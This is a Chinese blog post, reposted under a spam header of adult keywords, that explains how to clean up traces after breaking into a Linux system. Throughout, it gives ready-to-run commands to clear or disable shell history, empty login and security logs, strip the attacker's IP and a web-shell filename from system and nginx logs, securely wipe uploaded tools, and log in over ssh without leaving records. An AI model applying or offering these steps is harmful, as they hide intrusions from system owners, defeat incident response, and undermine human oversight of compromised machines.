日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 运维知识 > linux >内容正文

linux

Linux 入侵痕迹清理技巧

發布時間:2023/12/18 linux 32 豆豆
生活随笔 收集整理的這篇文章主要介紹了 Linux 入侵痕迹清理技巧 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

文章目錄

    • 01、清除history歷史命令記錄
    • 02、清除系統日志痕跡
    • 03、清除web入侵痕跡
    • 04、文件安全刪除工具
    • 05、隱藏遠程SSH登陸記錄

在攻擊結束后,如何不留痕跡的清除日志和操作記錄,以掩蓋入侵蹤跡,這其實是一個細致的技術活。你所做的每一個操作,都要被抹掉;你所上傳的工具,都應該被安全地刪掉。

01、清除history歷史命令記錄

查看歷史操作命令:

查看歷史操作命令:history
history記錄文件:more ~/.bash_history

第一種方式:

(1)編輯history記錄文件,刪除部分不想被保存的歷史命令。

vim ~/.bash_history

(2)清除當前用戶的history命令記錄

history -c

第二種方式:

(1)利用vim特性刪除歷史命令

復制代碼

#使用vim打開一個文件
vi test.txt
設置vim不記錄命令,Vim會將命令歷史記錄,保存在viminfo文件中。
:set history=0
用vim的分屏功能打開命令記錄文件.bash_history,編輯文件刪除歷史操作命令
vsp ~/.bash_history
清楚保存.bash_history文件即可。

復制代碼

(2)在vim中執行自己不想讓別人看到的命令

:set history=0
:!command

第三種方式:

通過修改配置文件/etc/profile,使系統不再保存命令記錄。

HISTSIZE=0

第四種方式:

登錄后執行下面命令,不記錄歷史命令(.bash_history)

unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0

02、清除系統日志痕跡

Linux 系統存在多種日志文件,來記錄系統運行過程中產生的日志。

復制代碼

/var/log/btmp 記錄所有登錄失敗信息,使用lastb命令查看
/var/log/lastlog 記錄系統中所有用戶最后一次登錄時間的日志,使用lastlog命令查看
/var/log/wtmp 記錄所有用戶的登錄、注銷信息,使用last命令查看
/var/log/utmp 記錄當前已經登錄的用戶信息,使用w,who,users等命令查看
/var/log/secure 記錄與安全相關的日志信息
/var/log/message 記錄系統啟動后的信息和錯誤日志

復制代碼

第一種方式:清空日志文件

清除登錄系統失敗的記錄:

[root@centos]# echo > /var/log/btmp
[root@centos]# lastb //查詢不到登錄失敗信息

清除登錄系統成功的記錄:

[root@centos]# echo > /var/log/wtmp
[root@centos]# last //查詢不到登錄成功的信息

清除相關日志信息:

清除用戶最后一次登錄時間:echo > /var/log/lastlog #lastlog命令
清除當前登錄用戶的信息:echo > /var/log/utmp #使用w,who,users等命令
清除安全日志記錄:cat /dev/null > /var/log/secure
清除系統日志記錄:cat /dev/null > /var/log/message

第二種方式:刪除/替換部分日志

日志文件全部被清空,太容易被管理員察覺了,如果只是刪除或替換部分關鍵日志信息,那么就可以完美隱藏攻擊痕跡。

刪除所有匹配到字符串的行,比如以當天日期或者自己的登錄ip

sed -i '/自己的ip/'d /var/log/messages

全局替換登錄IP地址:

sed -i 's/192.168.166.85/192.168.1.1/g' secure

03、清除web入侵痕跡

第一種方式: 直接替換日志ip地址

sed -i 's/192.168.166.85/192.168.1.1/g' access.log

第二種方式:清除部分相關日志

使用grep -v來把我們的相關信息刪除,

cat /var/log/nginx/access.log | grep -v evil.php > tmp.log

把修改過的日志覆蓋到原日志文件

cat tmp.log > /var/log/nginx/access.log/

04、文件安全刪除工具

(1)shred命令
實現安全的從硬盤上擦除數據,默認覆蓋3次,通過 -n指定數據覆蓋次數。

[root@centos]# shred -f -u -z -v -n 8 1.txt shred: 1.txt: pass 1/9 (random)... shred: 1.txt: pass 2/9 (ffffff)... shred: 1.txt: pass 3/9 (aaaaaa)... shred: 1.txt: pass 4/9 (random)... shred: 1.txt: pass 5/9 (000000)... shred: 1.txt: pass 6/9 (random)... shred: 1.txt: pass 7/9 (555555)... shred: 1.txt: pass 8/9 (random)... shred: 1.txt: pass 9/9 (000000)... shred: 1.txt: removing shred: 1.txt: renamed to 00000 shred: 00000: renamed to 0000 shred: 0000: renamed to 000 shred: 000: renamed to 00 shred: 00: renamed to 0 shred: 1.txt: removed

(2)dd命令
可用于安全地清除硬盤或者分區的內容。

dd if=/dev/zero of=要刪除的文件 bs=大小 count=寫入的次數

(3)wipe
Wipe 使用特殊的模式來重復地寫文件,從磁性介質中安全擦除文件。

wipe filename

(4)Secure-Delete
Secure-Delete 是一組工具集合,提供srm、smem、sfill、sswap,4個安全刪除文件的命令行工具。

srm filename sfill filename sswap /dev/sda1 smem

05、隱藏遠程SSH登陸記錄

隱身登錄系統,不會被w、who、last等指令檢測到。

ssh -T root@192.168.0.1 /bin/bash -i

不記錄ssh公鑰在本地.ssh目錄中

ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash –i

總結

以上是生活随笔為你收集整理的Linux 入侵痕迹清理技巧的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。